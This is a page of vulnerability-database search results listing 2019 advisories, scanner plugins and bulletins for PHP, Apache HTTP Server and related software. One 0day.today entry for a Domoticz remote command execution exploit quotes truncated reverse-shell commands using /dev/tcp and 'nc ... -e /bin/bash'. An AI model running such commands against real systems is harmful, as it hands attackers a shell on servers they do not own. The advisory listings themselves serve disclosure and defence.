
11650 matches found

Veracode
added 2019/05/02 4:42 a.m. | 42 views

Denial Of Service (DoS) And Remote Code Execution (RCE)

PHP is an HTML-embedded scripting language commonly used with the Apache HTTP Server. It was discovered that the PHP XSL extension did not restrict the file writing capability of libxslt. A remote attacker could use this flaw to create or overwrite an arbitrary file that is writable by the user...

CVSS 9.8 | AI score 7.8 | EPSS 0.99998
Exploits: 60 | References: 16 | Affected Software: 2

Veracode
added 2019/05/02 4:42 a.m. | 47 views

Denial Of Service (DoS)

PHP is an HTML-embedded scripting language commonly used with the Apache HTTP Server. It was discovered that the PHP XSL extension did not restrict the file writing capability of libxslt. A remote attacker could use this flaw to create or overwrite an arbitrary file that is writable by the user...

CVSS 9.8 | AI score 7.8 | EPSS 0.99998
Exploits: 60 | References: 9 | Affected Software: 1

Veracode
added 2019/05/02 4:42 a.m. | 52 views

Denial Of Service (DoS)

PHP is an HTML-embedded scripting language commonly used with the Apache HTTP Server. It was discovered that the PHP XSL extension did not restrict the file writing capability of libxslt. A remote attacker could use this flaw to create or overwrite an arbitrary file that is writable by the user...

CVSS 9.8 | AI score 6.3 | EPSS 0.99998
Exploits: 56 | References: 9 | Affected Software: 2

Veracode
added 2019/05/02 4:42 a.m. | 45 views

Arbitrary Code Execution

PHP is an HTML-embedded scripting language commonly used with the Apache HTTP Server. It was discovered that the PHP XSL extension did not restrict the file writing capability of libxslt. A remote attacker could use this flaw to create or overwrite an arbitrary file that is writable by the user...

CVSS 9.8 | AI score 6.3 | EPSS 0.99998
Exploits: 56 | References: 24 | Affected Software: 2

0day.today
added 2019/05/01 12:0 a.m. | 98 views

Domoticz 4.10577 - Unauthenticated Remote Command Execution Exploit

Exploit for multiple platform in category web applications !/usr/bin/env python -- coding: utf-8 -- Exploit Title: Unauthenticated Remote Command Execution on Domoticz & /dev/tcp/172.17.0.1/4444 0&1 &' ./exploit.py -zipcmd http://localhost:8080/ 'nc 10.0.2.2 4444 -e /bin/bash &' import argparse...

CVSS 7.5 | AI score 8.8 | EPSS 0.1727
Exploits: 5

Tenable Nessus
added 2019/04/30 12:0 a.m. | 47 views

EulerOS 2.0 SP3 : httpd (EulerOS-SA-2019-1294)

According to the version of the httpd packages installed, the EulerOS installation on the remote host is affected by the following vulnerability : - In Apache HTTP Server 2.4 release 2.4.37 and prior, mod_session checks the session expiry time before decoding the session. This causes session expir...

CVSS 7.5 | AI score 6.4 | EPSS 0.19994
Exploits: 0 | References: 2

Tenable Nessus
added 2019/04/30 12:0 a.m. | 26 views

EulerOS 2.0 SP5 : git (EulerOS-SA-2019-1291)

According to the version of the git packages installed, the EulerOS installation on the remote host is affected by the following vulnerability : - git: arbitrary code execution via .gitmodules CVE-2018-17456 Note that Tenable Network Security has extracted the preceding description block directly...

CVSS 9.8 | AI score 7.8 | EPSS 0.97356
Exploits: 12 | References: 2

Tenable Nessus
added 2019/04/26 12:0 a.m. | 65 views

NGINX Unit HTTP Server Detection

Nessus was able to detect the NGINX Unit HTTP server by looking at the HTTP banner on the remote host. C Tenable Network Security, Inc. include"compat.inc"; if description scriptid124336; scriptversion"1.4"; scriptsetattributeattribute:"pluginmodificationdate", value:"2022/10/12";...

AI score 5.5
Exploits: 0 | References: 1

Tenable Nessus
added 2019/04/26 12:0 a.m. | 36 views

Amazon Linux 2 : mod_http2 (ALAS-2019-1197)

In Apache HTTP server versions 2.4.37 and prior, by sending request bodies in a slow loris way to plain resources, the h2 stream for that request unnecessarily occupied a server thread cleaning up that incoming data. This affects only HTTP/2 mod_http2 connections. CVE-2018-17189 C Tenable Network...

CVSS 5.3 | AI score 6.3 | EPSS 0.19404
Exploits: 0 | References: 2

IBM Security Bulletins
added 2019/04/25 7:45 a.m. | 56 views

Security Bulletin: IBM Security SiteProtector System is affected by Apache HTTP Server vulnerabilities

Summary IBM Security SiteProtector System has addressed the following vulnerabilities in Apache HTTP Server. Vulnerability Details CVEID: CVE-2018-11759 DESCRIPTION: Apache Tomcat JK mod_jk Connector could allow a remote attacker to traverse directories on the system, caused by the improper handli...

CVSS 8.1 | AI score 0.8 | EPSS 0.90647
Exploits: 3 | Affected Software: 1

Amazon
added 2019/04/25 12:0 a.m. | 41 views

Low: mod_http2

Issue Overview: In Apache HTTP server versions 2.4.37 and prior, by sending request bodies in a slow loris way to plain resources, the h2 stream for that request unnecessarily occupied a server thread cleaning up that incoming data. This affects only HTTP/2 mod_http2 connections. CVE-2018-17189...

CVSS 5.3 | AI score 6.8 | EPSS 0.19404
Exploits: 0

BDU FSTEC
added 2019/04/25 12:0 a.m. | 4 views

The vulnerability of the Perl module of the Apache HTTP Server, related to the injection of code into the .htaccess file of the user, allows a hacker to execute arbitrary code.

The vulnerability of the Perl module used by the Apache HTTP Server is related to the injection of code into the .htaccess file of the user’s directory. Exploiting this vulnerability allows a remote attacker to execute arbitrary Perl code on behalf of the user, thereby executing Apache HTTP serve...

CVSS 10 | AI score 7.7 | EPSS 0.08946
Exploits: 0 | References: 4 | Affected Software: 2

IBM Security Bulletins
added 2019/04/24 8:50 p.m. | 71 views

Security Bulletin: Multiple vulnerabilities in Apache HTTP Server affect IBM Cognos Business Intelligence

Summary This bulletin addresses several security vulnerabilities in Apache HTTP Server that are fixed in IBM Cognos Business Intelligence. Vulnerability Details CVEID: CVE-2016-0736 DESCRIPTION: Apache HTTPD could allow a remote attacker to obtain sensitive information, caused by an error in...

CVSS 9.8 | AI score 1 | EPSS 0.49024
Exploits: 4 | Affected Software: 1

IBM Security Bulletins
added 2019/04/24 5:50 a.m. | 51 views

Security Bulletin: Apache HTTP Server vulnerability in IBM WebSphere Application Server shipped with IBM Tivoli Netcool Performance Manager (CVE-2018-17199).

Summary Apache HTTP Server vulnerability has been identified in WebSphere Application Server. WebSphere Application Server is shipped with Tivoli Netcool Performance Manager. Information about a security vulnerability affecting WebSphere Application Server has been published in a security bulleti...

AI score 0.2 | EPSS 0.19994
Exploits: 0 | Affected Software: 1

IBM Security Bulletins
added 2019/04/23 5:30 p.m. | 29 views

Security Bulletin: Multiple vulnerabilities in IBM HTTP Server used by WebSphere Application Server (CVE-2019-0211 CVE-2019-0220)

Summary There are multiple vulnerabilities in the IBM HTTP Server used by WebSphere Application Server. CVE-2019-0211 affects version 9 non-windows platforms only. Vulnerability Details CVEID: CVE-2019-0220 DESCRIPTION: Apache HTTP Server could provide weaker than expected security, caused by URL...

CVSS 7.8 | AI score 0.6 | EPSS 0.65005
Exploits: 8 | Affected Software: 1

Gentoo Linux
added 2019/04/22 12:0 a.m. | 173 views

Apache: Privilege escalation

Background The Apache HTTP server is one of the most popular web servers on the Internet. Description A vulnerability was discovered in Apache with MPM event, worker, or prefork. Impact An attacker could escalate privileges. Workaround There is no known workaround at this time. Resolution All...

CVSS 7.8 | AI score 2.2 | EPSS 0.65005
Exploits: 8

Tenable Nessus
added 2019/04/19 12:0 a.m. | 84 views

Oracle Primavera Unifier Multiple Vulnerabilities (Apr 2019 CPU)

According to its self-reported version number, the Oracle Primavera Unifier installation running on the remote web server is 16.x prior to 16.2.15.7 or 17.7.x prior to 17.12.10 or 18.x prior to 18.8.6. It is, therefore, affected by multiple vulnerabilities: - A deserialization vulnerability in...

CVSS 9.8 | AI score 8.1 | EPSS 0.94999
Exploits: 12 | References: 9

Tenable Nessus
added 2019/04/18 12:0 a.m. | 59 views

Oracle Fusion Middleware Oracle HTTP Server (Apr 2019 CPU)

The version of Oracle HTTP Server installed on the remote host is affected by a stack-based buffer overflow as noted in the April 2019 CPU advisory. The condition exists in the included cURL library due to using unsigned math when preventing the overflow. An unauthenticated, remote attacker can...

CVSS 9.8 | AI score 7.3 | EPSS 0.12771
Exploits: 1 | References: 2

Tenable Nessus
added 2019/04/17 12:0 a.m. | 57 views

openSUSE Security Update : apache2 (openSUSE-2019-1209)

This update for apache2 fixes the following issues : - CVE-2019-0211: A flaw in the Apache HTTP Server allowed less-privileged child processes or threads to execute arbitrary code with the privileges of the parent process. Attackers with control over CGI scripts or extension modules run by the...

CVSS 7.8 | AI score 7.3 | EPSS 0.65005
Exploits: 8 | References: 10

Tenable Nessus
added 2019/04/17 12:0 a.m. | 28 views

CentOS 7 : mod_auth_mellon (CESA-2019:0766)

An update for mod_auth_mellon is now available for Red Hat Enterprise Linux 7. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System CVSS base score, which gives a detailed severity rating, is available for each vulnerability...

CVSS 8.1 | AI score 6.9 | EPSS 0.02969
Exploits: 1 | References: 3